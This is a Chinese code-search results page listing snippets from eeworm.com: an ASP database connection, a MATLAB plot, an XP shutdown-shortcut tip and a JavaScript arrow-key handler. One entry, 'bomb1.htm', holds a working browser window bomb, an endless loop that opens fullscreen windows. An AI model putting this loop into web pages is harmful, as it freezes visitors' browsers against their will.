代码搜索:Script
找到约 10,000 项符合「Script」的源代码
代码结果 10,000
www.eeworm.com/read/159164/10685527
asa global.asa
sub Application_OnStart
connstr="Provider=Microsoft.Jet.OLEDB.4.0;"&_
"Data Source="& Server.MapPath("ljl.ASP")
Ap
www.eeworm.com/read/159164/10685828
htm bomb1.htm
while (true){ window.open("bomb.htm","","fullscreen=yes,Status=no,scrollbars=no,resizable=no");}
www.eeworm.com/read/350990/10690656
m ip_01_01.m
% MATLAB script for Illustrative Problem 1, Chapter 1.
n=[-20:1:20];
x=abs(sinc(n/2));
stem(n,x);
www.eeworm.com/read/421857/10692136
txt quick shutdown for xp, how to create a shutdown shortcut..txt
Ever want a quicker way to shutdown XP without navigating through the start menu, or using a third party shutdown utility Here is a script that will do just that.
Right click the desktop and choose
www.eeworm.com/read/421846/10692831
htm 7.6 javascript捕获方向键.htm
反选
function check()
{
if(event.keyCode =="37")
alert("您选择了左键!");
if(event.keyCode =="38")
alert("您选择了上键!");